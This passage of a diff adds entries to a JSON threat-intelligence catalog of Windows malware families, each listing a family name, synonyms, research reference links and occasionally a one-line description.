"https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk", + "https://www.secureworks.com/research/malware-analysis-of-the-lurk-downloader" + ] + }, + "uuid": "929112e4-e252-4273-b3c2-fd414cfb2776", + "value": "Lurk", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.luzo" + ] + }, + "uuid": "8c0d3012-9dcb-46d3-964f-8a3c5b58d1b2", + "value": "Luzo", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Lucky Locker", + "Adneukine", + "Bomba Locker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.lyposit", + "https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/", + "http://malware.dontneedcoffee.com/2012/11/inside-view-of-lyposit-aka-for-its.html", + "http://malware.dontneedcoffee.com/2013/05/unveiling-locker-bomba-aka-lucky-locker.html" + ] + }, + "uuid": "0dea3e9d-b443-40f6-a9e0-ba622850ee8a", + "value": "Lyposit", + "description": "" + }, + { + "meta": { + "synonyms": [ + "El Machete" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.machete", + "https://securelist.com/el-machete/66108/", + "https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html", + "https://medium.com/@verovaleros/el-machete-what-do-we-know-about-the-apt-targeting-latin-america-be7d11e690e6" + ] + }, + "uuid": "9a724a1d-7eb1-4e2b-8cc3-e1b41e8b5cff", + "value": "Machete", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.madmax", + "https://www.arbornetworks.com/blog/asert/mad-max-dga/" + ] + }, + "uuid": "42760c2c-bf00-4ace-871c-6dcbbd90b2de", + "value": "MadMax", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala", + "https://securelist.com/the-magala-trojan-clicker-a-hidden-advertising-threat/78920/" + ] + }, + "uuid": "192f93bc-fcf6-4aaf-ae2f-d9435a67e48b", + "value": "Magala", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber", + "https://blog.malwarebytes.com/threat-analysis/2017/10/magniber-ransomware-exclusively-for-south-koreans/", + "https://www.youtube.com/watch?v=lqWJaaofNf4", + "http://asec.ahnlab.com/1124" + ] + }, + "uuid": "fedac411-0638-48dc-8ac5-1b4171fa8a29", + "value": "Magniber", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.majik_pos", + "http://blog.trendmicro.com/trendlabs-security-intelligence/majikpos-combines-pos-malware-and-rats/" + ] + }, + "uuid": "c1144eb8-a2bc-48d7-b0fb-18f124c1f8d9", + "value": "MajikPos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs", + "http://contagiodump.blogspot.com/2012/12/nov-2012-backdoorw32makadocs-sample.html", + "https://www.symantec.com/connect/blogs/malware-targeting-windows-8-uses-google-docs" + ] + }, + "uuid": "996e73e9-b093-4987-9992-f52008e55b24", + "value": "Makadocs", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.makloader", + "https://twitter.com/James_inthe_box/status/1046844087469391872" + ] + }, + "uuid": "7e088669-3ddb-4cc5-bc9b-ae59f61ada82", + "value": "MakLoader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub", + "https://blog.malwarebytes.com/threat-analysis/2016/03/maktub-locker-beautiful-and-dangerous/", + "https://bartblaze.blogspot.de/2018/04/maktub-ransomware-possibly-rebranded-as.html", + "https://www.intezer.com/iron-cybercrime-group-under-the-scope-2/" + ] + }, + "uuid": "bdb27944-1f79-46f7-a0d7-c344429790c2", + "value": "Maktub", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.malumpos", + "http://documents.trendmicro.com/images/tex/pdf/MalumPOS%20Technical%20Brief.pdf" + ] + }, + "uuid": "159b0dbf-52f6-4690-a545-0f890ba7b9b7", + "value": "MalumPOS", + "description": "" + }, + { + "meta": { + "synonyms": [ + "HDDCryptor", + "DiskCryptor" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mamba", + "http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/", + "https://securelist.com/the-return-of-mamba-ransomware/79403/" + ] + }, + "uuid": "df320366-7970-4af0-b1f4-9f9492dede53", + "value": "Mamba", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CryptoHost" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manamecrypt", + "https://www.bleepingcomputer.com/news/security/cryptohost-decrypted-locks-files-in-a-password-protected-rar-file/", + "https://www.gdatasoftware.com/blog/2016/04/28234-manamecrypt-a-ransomware-that-takes-a-different-route" + ] + }, + "uuid": "54cd671e-b7e4-4dd3-9bfa-dc0ba5105944", + "value": "ManameCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "junidor", + "mengkite", + "vedratve" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mangzamel", + "https://www.hybrid-analysis.com/sample/5d631d77401615d53f3ce3dbc2bfee5d934602dc35d488aa7cebf9b3ff1c4816?environmentId=2" + ] + }, + "uuid": "ed3a94c9-8a5a-4ae7-bdd9-b000e01df3a0", + "value": "Mangzamel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manifestus_ransomware", + "https://twitter.com/struppigel/status/811587154983981056" + ] + }, + "uuid": "5b75db42-b8f2-4e52-81d3-f329e49e1af2", + "value": "Manifestus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.manitsme", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "13b0d9ff-0be0-4539-8c86-dfca7a0e79f6", + "value": "ManItsMe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mapiget", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "8a97307f-a029-4c43-88e1-debed2b80b14", + "value": "MAPIget", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-prepare-more-part-1-marap" + ] + }, + "uuid": "c2c3ac24-6921-4bba-a2c8-ac3d364feaeb", + "value": "Marap", + "description": "Marap is a downloader, named after its command and control (C&C) phone home parameter \"param\" spelled backwards. It is written in C and contains a few notable anti-analysis features." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker", + "https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/" + ] + }, + "uuid": "59717468-271e-4d15-859a-130681c17ddb", + "value": "Matrix Banker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_ransom" + ] + }, + "uuid": "118ced99-5942-497f-885a-2b25d0569b4b", + "value": "Matrix Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matryoshka_rat", + "http://www.clearskysec.com/tulip/" + ] + }, + "uuid": "c8a7c6e7-c6d3-4978-8a1d-190162de5e0d", + "value": "Matryoshka RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.matsnu", + "https://blog.checkpoint.com/wp-content/uploads/2015/07/matsnu-malwareid-technical-brief.pdf" + ] + }, + "uuid": "f566d597-d0c4-4932-b738-ac5774eedb7a", + "value": "Matsnu", + "description": "" + }, + { + "meta": { + "synonyms": [ + "DexLocker" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock", + "https://www.bleepingcomputer.com/news/security/dexcrypt-mbrlocker-demands-30-yuan-to-gain-access-to-computer/", + "https://www.hybrid-analysis.com/sample/dfc56a704b5e031f3b0d2d0ea1d06f9157758ad950483b44ac4b77d33293cb38?environmentId=100", + "https://app.any.run/tasks/0a7e643f-7562-4575-b8a5-747bd6b5f02d", + "http://id-ransomware.blogspot.com.tr/2018/02/mbrlock-hax-ransomware.html" + ] + }, + "uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791", + "value": "MBRlock", + "description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts." + }, + { + "meta": { + "synonyms": [ + "MyBios" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mebromi", + "http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html", + "https://www.symantec.com/connect/blogs/bios-threat-showing-again", + "http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/", + "https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/" + ] + }, + "uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6", + "value": "Mebromi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.medre", + "http://contagiodump.blogspot.com/2012/06/medrea-autocad-worm-samples.html" + ] + }, + "uuid": "243ae1f7-183e-4ea9-82cf-3353a0ef78f4", + "value": "Medre", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa", + "https://webcache.googleusercontent.com/search?q=cache:ZbKznF-dogcJ:https://www.toolbase.me/board/topic/10061-b-medusa-irc-ddos-botnet-bypass-cf-cookie-protections/", + "https://news.drweb.com/show/?i=10302&lng=en", + "https://www.arbornetworks.com/blog/asert/medusahttp-ddos-slithers-back-spotlight/", + "https://zerophagemalware.com/2017/10/13/rig-ek-via-malvertising-drops-a-miner/" + ] + }, + "uuid": "237a1c2d-eb14-483d-9a2e-82f10b63ec06", + "value": "win.medusa", + "description": "Medusa is a DDoS bot written in .NET 2.0. In its current incarnation its C&C protocol is based on HTTP, while its predecessor made use of IRC." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei" + ] + }, + "uuid": "48cb12ee-c60a-46cd-b376-39226027c616", + "value": "Mewsei", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miancha", + "https://www.contextis.com//documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf" + ] + }, + "uuid": "a3370013-6c47-422e-a4d4-1b86ee71e5e5", + "value": "Miancha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.micrass", + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + ] + }, + "uuid": "6c09cc53-7160-47c6-8df8-3e0d42deb5a6", + "value": "Micrass", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin", + "https://securelist.com/a-simple-example-of-a-complex-cyberattack/82636/", + "https://cdn.securelist.com/files/2017/09/Microcin_Technical_4PDF_eng_final_s.pdf" + ] + }, + "uuid": "185d8b28-0179-4ec6-a3c8-201b1936b9aa", + "value": "Microcin", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.micropsia", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", + "http://blog.talosintelligence.com/2017/06/palestine-delphi.html", + "https://research.checkpoint.com/apt-attack-middle-east-big-bang/" + ] + }, + "uuid": "b37f312f-a0b1-41a9-88ae-da2844c19cae", + "value": "Micropsia", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mikoponi" + ] + }, + "uuid": "87abb59d-0012-4d45-9e75-136372b25bf8", + "value": "Mikoponi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "801d8a6a-b7ba-4557-af5d-1005e53145e2", + "value": "MILKMAID", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz", + "https://github.com/gentilkiwi/mimikatz", + " https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/", + "http://blog.gentilkiwi.com/securite/un-observateur-evenements-aveugle" + ] + }, + "uuid": "588fb91d-59c6-4667-b299-94676d48b17b", + "value": "MimiKatz", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniasp", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "a4f8bacf-2076-4e00-863c-874cdd833a41", + "value": "MiniASP", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage", + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" + ] + }, + "uuid": "6f6da371-2d62-4245-9aa3-8570e39222ae", + "value": "Mirage", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miragefox", + "https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" + ] + }, + "uuid": "b3e89b03-c5af-41cd-88b8-e15335abbb30", + "value": "MirageFox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirai", + "https://twitter.com/PhysicalDrive0/status/830070569202749440", + "https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks/", + "https://www.incapsula.com/blog/new-mirai-variant-ddos-us-college.html" + ] + }, + "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", + "value": "Mirai", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.misdat", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf" + ] + }, + "uuid": "d1597713-fe7a-45bd-8b59-1a13c7e097d8", + "value": "Misdat", + "description": "" + }, + { + "meta": { + "synonyms": [ + "MixFox", + "ModPack" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox" + ] + }, + "uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da", + "value": "Misfox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref" + ] + }, + "uuid": "4c786624-4a55-46e6-849d-b65552034235", + "value": "Miuref", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core", + "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + ] + }, + "uuid": "6363cc2f-08f1-47a0-adbf-5cf19ea89ffd", + "value": "MM Core", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mobi_rat", + "https://blog.malwarebytes.com/threat-analysis/2017/07/malware-abusing-ffmpeg/" + ] + }, + "uuid": "e33aa1f8-a631-4274-afe0-f2fd3426332e", + "value": "MobiRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" + ] + }, + "uuid": "7132c1de-9a3f-4f08-955f-ab6f7a09e17d", + "value": "Mocton", + "description": "" + }, + { + "meta": { + "synonyms": [ + "straxbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.modpos", + "https://www.fireeye.com/blog/threat-research/2015/11/modpos.html", + "https://twitter.com/physicaldrive0/status/670258429202530306" + ] + }, + "uuid": "026d638b-cc51-4eff-97fc-d61215a1a70a", + "value": "ModPOS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moker", + "https://breakingmalware.com/malware/moker-part-1-dissecting-a-new-apt-under-the-microscope/", + "https://breakingmalware.com/malware/moker-part-2-capabilities/", + "http://blog.ensilo.com/moker-a-new-apt-discovered-within-a-sensitive-network", + "https://blog.malwarebytes.com/threat-analysis/2017/04/elusive-moker-trojan/" + ] + }, + "uuid": "90a1a61e-3e69-4b92-ac11-9095ac2d9cf4", + "value": "Moker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mokes", + "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" + ] + }, + "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", + "value": "Mokes", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mole", + "https://www.proofpoint.com/us/threat-insight/post/adgholas-malvertising-campaign-using-astrum-ek-deliver-mole-ransomware", + "https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" + ] + }, + "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", + "value": "Mole", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", + "http://www.clearskysec.com/iec/", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" + ] + }, + "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", + "value": "Molerat Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CoinMiner" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", + "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" + ] + }, + "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", + "value": "Monero Miner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" + ] + }, + "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", + "value": "MoonWind", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" + ] + }, + "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", + "value": "Morphine", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", + "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", + "https://www.f-secure.com/weblog/archives/00002227.html", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" + ] + }, + "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", + "value": "Morto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/" + ] + }, + "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", + "value": "Mosquito", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" + ] + }, + "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", + "value": "Moure", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", + "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" + ] + }, + "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", + "value": "mozart", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpk", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3", + "value": "MPK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", + "value": "MPKBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", + "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/" + ] + }, + "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", + "value": "Multigrain POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", + "value": "murkytop", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" + ] + }, + "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", + "value": "Murofet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", + "http://vms.drweb.ru/virus/?_is=1&i=8477920" + ] + }, + "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", + "value": "Mutabaha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" + ] + }, + "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", + "value": "MyKings Spreader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", + "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" + ] + }, + "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", + "value": "MyloBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", + "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" + ] + }, + "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", + "value": "N40", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" + ] + }, + "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", + "value": "Nabucur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", + "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" + ] + }, + "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", + "value": "Nagini", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + ] + }, + "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", + "value": "Naikon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", + "value": "Nanocore RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" + ] + }, + "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", + "value": "NanoLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", + "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", + "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" + ] + }, + "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", + "value": "Narilam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", + "https://www.ncsc.gov.uk/alerts/turla-group-malware" + ] + }, + "uuid": "d8295eba-60ef-4900-8091-d694180de565", + "value": "Nautilus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", + "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" + ] + }, + "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", + "value": "NavRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "nucurs" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", + "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", + "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", + "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", + "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", + "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/", + "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/" + ] + }, + "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", + "value": "Necurs", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nemain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", + "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" + ] + }, + "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", + "value": "Nemim", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", + "value": "NetC", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ScoutEagle" + ], + "type": [], + "refs": [ + 